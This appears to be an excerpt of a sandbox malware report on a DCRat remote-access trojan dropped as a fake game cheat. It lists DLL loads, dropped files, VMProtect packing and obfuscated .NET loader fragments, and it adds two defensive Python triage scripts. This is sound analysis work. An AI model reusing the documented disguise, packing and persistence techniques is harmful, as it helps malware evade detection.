Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: pcacli.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: vbscript.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: scrobj.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: scrrun.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: dlnashext.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wpdshext.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: slc.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: vbscript.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: scrobj.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: textshaping.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: textinputframework.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: coreuicomponents.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: apphelp.dll
Source: C:\blockweb\portrefNet.exe | Section loaded: mscoree.dll
Source: C:\blockweb\portrefNet.exe | Section loaded: apphelp.dll
Source: C:\blockweb\portrefNet.exe | Section loaded: kernel.appcore.dll
Source: C:\blockweb\portrefNet.exe | Section loaded: version.dll
Source: C:\blockweb\portrefNet.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\blockweb\portrefNet.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\blockweb\portrefNet.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\blockweb\portrefNet.exe | Section loaded: uxtheme.dll
Source: C:\blockweb\portrefNet.exe | Section loaded: windows.storage.dll
Source: C:\blockweb\portrefNet.exe | Section loaded: wldp.dll
Source: C:\blockweb\portrefNet.exe | Section loaded: profapi.dll
Source: C:\blockweb\portrefNet.exe | Section loaded: cryptsp.dll
Source: C:\blockweb\portrefNet.exe | Section loaded: rsaenh.dll
Source: C:\blockweb\portrefNet.exe | Section loaded: cryptbase.dll
Source: C:\blockweb\portrefNet.exe | Section loaded: sspicli.dll
Source: C:\blockweb\portrefNet.exe | Section loaded: amsi.dll
Source: C:\blockweb\portrefNet.exe | Section loaded: userenv.dll
Source: C:\blockweb\portrefNet.exe | Section loaded: ntmarta.dll
Source: C:\blockweb\portrefNet.exe | Section loaded: wbemcomn.dll
Source: C:\blockweb\portrefNet.exe | Section loaded: propsys.dll
Source: C:\blockweb\portrefNet.exe | Section loaded: dlnashext.dll
Source: C:\blockweb\portrefNet.exe | Section loaded: wpdshext.dll
Source: C:\blockweb\portrefNet.exe | Section loaded: edputil.dll
Source: C:\blockweb\portrefNet.exe | Section loaded: urlmon.dll
Source: C:\blockweb\portrefNet.exe | Section loaded: iertutil.dll
Source: C:\blockweb\portrefNet.exe | Section loaded: srvcli.dll
Source: C:\blockweb\portrefNet.exe | Section loaded: netutils.dll
Source: C:\blockweb\portrefNet.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\blockweb\portrefNet.exe | Section loaded: wintypes.dll
Source: C:\blockweb\portrefNet.exe | Section loaded: appresolver.dll
Source: C:\blockweb\portrefNet.exe | Section loaded: bcp47langs.dll
Source: C:\blockweb\portrefNet.exe | Section loaded: slc.dll
Source: C:\blockweb\portrefNet.exe | Section loaded: sppc.dll
Source: C:\blockweb\portrefNet.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\blockweb\portrefNet.exe | Section loaded: onecoreuapcommonproxystub.dll
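The per-process module list above is easier to reason about as a capability summary: which images load the WMI client library, a script engine, the task scheduler COM library, or an HTTP/TLS stack, and whether those images live in a location a legitimate Windows component would. The block below is an added example written for this page; it is not part of the Joe Sandbox report and not tooling from Joe Security. It parses lines in the report's own "Source: ... Section loaded: ..." layout (both the fused form with the trailing "Jump to behavior" link text and a column-separated form), maps a small hand-chosen set of DLLs to the capability they usually indicate, and flags images outside the Windows and Program Files trees that pull in WMI, scheduler, script-engine or HTTP/TLS libraries. The DLL-to-capability table, the trusted-directory prefixes and the sample lines (a constructed subset of the listing) are assumptions of the example; urlmon.dll is deliberately not treated as an HTTP client because the shell loads it as a side effect, as the Lunch LaCheat.exe and wscript.exe entries show.

```python
import re
from collections import defaultdict

# Constructed sample: a subset of the report's "Section loaded" lines, in both
# layouts the report text appears in. Not the full listing.
SAMPLE_LINES = r"""
Source: C:\blockweb\portrefNet.exeSection loaded: mscoree.dllJump to behavior
Source: C:\blockweb\portrefNet.exeSection loaded: amsi.dll
Source: C:\blockweb\portrefNet.exeSection loaded: wbemcomn.dll
Source: C:\blockweb\portrefNet.exeSection loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dll
Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: wbemcomn.dll
"""

# Tolerant of the fused "exeSection loaded:" form and of the link text.
LINE_RE = re.compile(
    r"Source:\s*(?P<proc>.+?\.exe)\s*\|?\s*Section loaded:\s*(?P<dll>\S+?\.dll)"
    r"(?:Jump to behavior)?\s*$",
    re.IGNORECASE,
)

# Assumed mapping from DLL to the capability it usually indicates. Kept small
# and conservative; urlmon.dll is omitted because shell APIs pull it in.
CAPABILITIES = {
    "mscoree.dll": "dotnet-clr",
    "amsi.dll": "amsi",                 # CLR or script host handing content to AMSI
    "vbscript.dll": "script-engine", "jscript.dll": "script-engine",
    "scrrun.dll": "script-engine",
    "wbemcomn.dll": "wmi",
    "taskschd.dll": "task-scheduler",
    "winhttp.dll": "http-client", "wininet.dll": "http-client",
    "schannel.dll": "tls", "ncryptsslp.dll": "tls",
    "dnsapi.dll": "dns",
    "rsaenh.dll": "crypto", "cryptsp.dll": "crypto",
    "ncrypt.dll": "crypto", "bcrypt.dll": "crypto",
}

# Assumed "expected" locations for system binaries (case-insensitive prefix match).
TRUSTED_PREFIXES = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")

# Capabilities that matter most when an image runs from an unexpected directory.
EGRESS_OR_PERSIST = {"http-client", "tls", "wmi", "task-scheduler", "script-engine"}


def parse_loads(text):
    """Return {process image path: set of lowercase DLL names}."""
    loads = defaultdict(set)
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if m:
            loads[m.group("proc")].add(m.group("dll").lower())
    return loads


def summarize(text):
    """Per-process capability summary with flags for untrusted image locations."""
    result = {}
    for proc, dlls in parse_loads(text).items():
        caps = {CAPABILITIES[d] for d in dlls if d in CAPABILITIES}
        trusted = proc.lower().startswith(TRUSTED_PREFIXES)
        flags = []
        if not trusted:
            flags.append("image-outside-system-dirs")
            hot = sorted(caps & EGRESS_OR_PERSIST)
            if hot:
                flags.append("untrusted-image-with:" + ",".join(hot))
        result[proc] = {
            "dlls": sorted(dlls),
            "capabilities": sorted(caps),
            "trusted_path": trusted,
            "flags": flags,
        }
    return result


if __name__ == "__main__":
    for proc, info in summarize(SAMPLE_LINES).items():
        print(proc, info["capabilities"], info["flags"])
```

Run against a full report export, the summary separates the expected loads (wscript.exe hosting vbscript.dll, WMIC.exe loading wbemcomn.dll) from the ones worth a closer look: a .NET image under C:\blockweb\ talking to WMI, and a dropped executable in %TEMP% with a WinHTTP and Schannel stack.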
Source: C:\Users\user\Desktop\FixTsDfhiC.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
Source: C:\blockweb\portrefNet.exe | Directory created: C:\Program Files\Windows Portable Devices\ukzoUeHPfeDwGdTDRNL.exe
Source: C:\blockweb\portrefNet.exe | Directory created: C:\Program Files\Windows Portable Devices\4811fe426320bd
Source: C:\blockweb\portrefNet.exe | Directory created: C:\Program Files\7-Zip\Lang\ukzoUeHPfeDwGdTDRNL.exe
Source: C:\blockweb\portrefNet.exe | Directory created: C:\Program Files\7-Zip\Lang\4811fe426320bd
Source: FixTsDfhiC.exe | Static file information: File size 13317632 > 1048576
Source: FixTsDfhiC.exe | Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0xcb1400
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: Lunch LaCheat.exe, 00000022.00000003.1808515940.0000000004F74000.00000004.00000020.00020000.00000000.sdmp, Lunch LaCheat.exe, 00000022.00000002.1824780821.0000000004CE1000.00000004.00000020.00020000.00000000.sdmp, Lunch LaCheat.exe, 00000022.00000003.1805618598.000000000396E000.00000004.00000020.00020000.00000000.sdmp, Lunch LaCheat.exe, 00000022.00000002.1823791845.0000000003966000.00000004.00000020.00020000.00000000.sdmp, Lunch LaCheat.exe, 00000022.00000003.1807504603.0000000004CE9000.00000004.00000020.00020000.00000000.sdmp, Lunch LaCheat.exe, 00000022.00000002.1823496476.00000000036D8000.00000004.00000020.00020000.00000000.sdmp, Lunch LaCheat.exe, 00000022.00000003.1808928510.0000000005207000.00000004.00000020.00020000.00000000.sdmp, Lunch LaCheat.exe, 00000022.00000003.1806529098.0000000003BFA000.00000004.00000020.00020000.00000000.sdmp, Lunch LaCheat.exe, 00000022.00000002.1824009704.0000000003BF0000.00000004.00000020.00020000.00000000.sdmp, DCRatBuild.exe, 00000023.00000003.1807258543.0000000004D80000.00000004.00000020.00020000.00000000.sdmp, DCRatBuild.exe, 00000023.00000000.1805391607.0000000000763000.00000002.00000001.01000000.00000008.sdmp, DCRatBuild.exe, 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp, DCRatBuild.exe, 00000023.00000003.1808042217.0000000004E9A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \Desktop\DCLIB-master\obj\Debug\DCLIB.pdbU.o. a._CorDllMainmscoree.dll source: portrefNet.exe, 0000002C.00000002.1947126022.00000000024A0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: \Desktop\DCLIB-master\obj\Debug\DCLIB.pdb source: portrefNet.exe, 0000002C.00000002.1947126022.00000000024A0000.00000004.08000000.00040000.00000000.sdmp

Data Obfuscation

Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, ruGDE8wHCs1LugFJYDC.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, ruGDE8wHCs1LugFJYDC.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, ruGDE8wHCs1LugFJYDC.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, mVPDZufZM2W7mkK879j.cs | .Net Code: wxQMPJUTVO System.AppDomain.Load(byte[])
Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, mVPDZufZM2W7mkK879j.cs | .Net Code: wxQMPJUTVO System.Reflection.Assembly.Load(byte[])
Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, mVPDZufZM2W7mkK879j.cs | .Net Code: wxQMPJUTVO
Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, mVPDZufZM2W7mkK879j.cs | .Net Code: wxQMPJUTVO System.AppDomain.Load(byte[])
Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, mVPDZufZM2W7mkK879j.cs | .Net Code: wxQMPJUTVO System.Reflection.Assembly.Load(byte[])
Source: 34.3.Lunch LaCheat.exe.39bb5b0.0.raw.unpack, mVPDZufZM2W7mkK879j.cs | .Net Code: wxQMPJUTVO
Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, mVPDZufZM2W7mkK879j.cs | .Net Code: wxQMPJUTVO System.AppDomain.Load(byte[])
Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, mVPDZufZM2W7mkK879j.cs | .Net Code: wxQMPJUTVO System.Reflection.Assembly.Load(byte[])
Source: 34.2.Lunch LaCheat.exe.39b35a8.3.raw.unpack, mVPDZufZM2W7mkK879j.cs | .Net Code: wxQMPJUTVO
Source: 52cheatand52rat.exe.34.dr | Static PE information: 0x9C61056C [Wed Feb 19 18:54:36 2053 UTC]
Source: initial sample | Static PE information: section where entry point is pointing to: .vmp1
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | File created: C:\blockweb\__tmp_rar_sfx_access_check_4136515
Source: Lunch LaCheatV2.exe.0.dr | Static PE information: section name: .vmp0
Source: Lunch LaCheatV2.exe.0.dr | Static PE information: section name: .vmp1
Source: Lunch LaCheat.exe.1.dr | Static PE information: section name: .vmp0
Source: Lunch LaCheat.exe.1.dr | Static PE information: section name: .vmp1
Source: DCRatBuild.exe.34.dr | Static PE information: section name: .didat
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: 35_2_0074E28C push eax; ret | 35_2_0074E2AA
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: 35_2_0074CAC9 push eax; retf 0074h | 35_2_0074CACE
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: 35_2_0074ED46 push ecx; ret | 35_2_0074ED59
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | Code function: 36_2_00007FFD9BAA5D50 push esi; retf | 36_2_00007FFD9BAA5D64
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | Code function: 36_2_00007FFD9BAA00BD pushad ; iretd | 36_2_00007FFD9BAA00C1
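The static PE indicators the report lists for this sample set (a file over 1 MiB whose .rsrc raw size exceeds 0x100000, the VMProtect section names .vmp0/.vmp1, an entry point that resolves into .vmp1, and a link timestamp of 0x9C61056C, which is in 2053) can all be checked from the headers without running anything. The block below is an added example written for this page, not code from the Joe Sandbox report or from Joe Security's tooling. It reads the DOS header, PE signature, COFF header, the AddressOfEntryPoint field and the section table by hand (no pefile dependency), then reports the same four conditions. The two samples it triages are constructed header-only blobs built by a helper in the block, not real files, so the file-size check only fires on a real on-disk sample; the 1 MiB thresholds and the set of section names treated as VMProtect's are assumptions chosen to match the report's findings.

```python
import datetime
import struct
import sys

VMP_SECTIONS = {".vmp0", ".vmp1", ".vmp2"}   # assumed VMProtect section names
ONE_MIB = 0x100000                            # the report's size threshold


def parse_pe(data):
    """Minimal PE32/PE32+ header parser: timestamp, entry RVA, section table."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    _machine, nsections, timestamp, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]   # same offset for PE32 and PE32+
    sections = []
    for i in range(nsections):
        name, vsize, vaddr, raw_size, raw_ptr = struct.unpack_from("<8sIIII", data, opt + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode("latin-1"), "vsize": vsize,
                         "vaddr": vaddr, "raw_size": raw_size, "raw_ptr": raw_ptr})
    return {"timestamp": timestamp, "entry_rva": entry_rva, "sections": sections}


def section_for_rva(rva, sections):
    for s in sections:
        if s["vaddr"] <= rva < s["vaddr"] + max(s["vsize"], s["raw_size"]):
            return s
    return None


def triage(data, now=None):
    """Return the list of indicator names that apply to the given PE bytes."""
    pe = parse_pe(data)
    now = now or datetime.datetime.now(datetime.timezone.utc)
    findings = []
    if {s["name"] for s in pe["sections"]} & VMP_SECTIONS:
        findings.append("vmprotect-section-names")
    ep = section_for_rva(pe["entry_rva"], pe["sections"])
    if ep and ep["name"] in VMP_SECTIONS:
        findings.append("entry-point-in-" + ep["name"])
    built = datetime.datetime.fromtimestamp(pe["timestamp"], datetime.timezone.utc)
    if built > now:
        findings.append("timestamp-in-future:" + built.strftime("%Y-%m-%d"))
    for s in pe["sections"]:
        if s["name"] == ".rsrc" and s["raw_size"] > ONE_MIB:
            findings.append("oversized-rsrc:0x%x" % s["raw_size"])
    if len(data) > ONE_MIB:
        findings.append("file-over-1mib")
    return findings


def build_sample(sections, timestamp, entry_rva):
    """Constructed header-only PE32 blob (not loadable); sections = (name, vaddr, vsize, raw_size)."""
    opt_size = 224
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)          # e_lfanew at 0x3C -> 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), timestamp, 0, 0, opt_size, 0x0102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)                        # PE32 magic
    struct.pack_into("<I", opt, 16, entry_rva)                   # AddressOfEntryPoint
    table = b"".join(struct.pack("<8sIIIIIIHHI", name.encode(), vsize, vaddr, raw_size, 0, 0, 0, 0, 0, 0)
                     for name, vaddr, vsize, raw_size in sections)
    return dos + b"PE\0\0" + coff + bytes(opt) + table


# Constructed to mirror the report: .rsrc raw size 0xcb1400, .vmp0/.vmp1, entry in .vmp1, 2053 timestamp.
PACKED_SAMPLE = build_sample(
    [(".text", 0x1000, 0x1000, 0x1000), (".rsrc", 0x2000, 0xCB1400, 0xCB1400),
     (".vmp0", 0xCB4000, 0x1000, 0), (".vmp1", 0xCB5000, 0x400000, 0x400000)],
    timestamp=0x9C61056C, entry_rva=0xCB5010)

# Constructed unremarkable layout: entry in .text, 2020 timestamp, small .rsrc.
CLEAN_SAMPLE = build_sample(
    [(".text", 0x1000, 0x2000, 0x2000), (".rdata", 0x3000, 0x1000, 0x1000),
     (".data", 0x4000, 0x1000, 0x200), (".rsrc", 0x5000, 0x800, 0x800)],
    timestamp=1_600_000_000, entry_rva=0x1100)


if __name__ == "__main__":
    if len(sys.argv) > 1:
        with open(sys.argv[1], "rb") as fh:
            print(sys.argv[1], triage(fh.read()))
    else:
        print("packed:", triage(PACKED_SAMPLE))
        print("clean:", triage(CLEAN_SAMPLE))
```

Run with a file argument it triages a real sample; run without one it prints the findings for the two constructed headers. A timestamp in the future is not proof of tampering on its own (reproducible builds and some linkers write deliberate values), so it is reported alongside the section evidence rather than scored separately.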
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, X1FXHctVq7kE4pJRmYh.cs | High entropy of concatenated method names: 'LkY51lKamo', 'apE59apTLb', 'l185p0gr7V', 'oNr5ddQGeP', 'v1x5c60a9L', 'Uuty8tkM18wp61hrkDf', 'VeRQjGkEHw3Q8asgmVu', 'Fbw6jrkvF7gtX0xJpVa', 'lC0gFckLZ18puOV2AUc', 'AMtCArkCcB6NLMt5FHW'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, XfZ5nTqO2eBgWgje4xu.cs | High entropy of concatenated method names: 'Ai7', 'YZ8', '_56U', 'G9C', 'sTi4UqyGRJftkS1ZHnt', 'aNQkoEyzVITyOnD7t8F', 'X8PHJDq5Jo8W1Z56NsX', 'JnVY21qcxIgQ4hFRZVs', 'lyvonuqnw8f7bxLb3DN', 'vVOG7WqQl5pajghAZns'
                        Source: 34.3.Lunch LaCheat.exe.4fc15b0.3.raw.unpack, Lt3DSvqMxZcQ5oZBmim.cs | High entropy of concatenated method names: 'R1x', 'YZ8', '_8U7', 'G9C', 'ti108i6bPMh7NNdD0Fg', 'gVVhxC61nmmPWuhSTk4', 'DQbUm86OGZcdm3KKjFo', 'KRhhys6vb76PXjs3uIn', 'gJmdVq6LVSYWZoOx71F', 'HOeuRI6MHyj8SAiueEi'
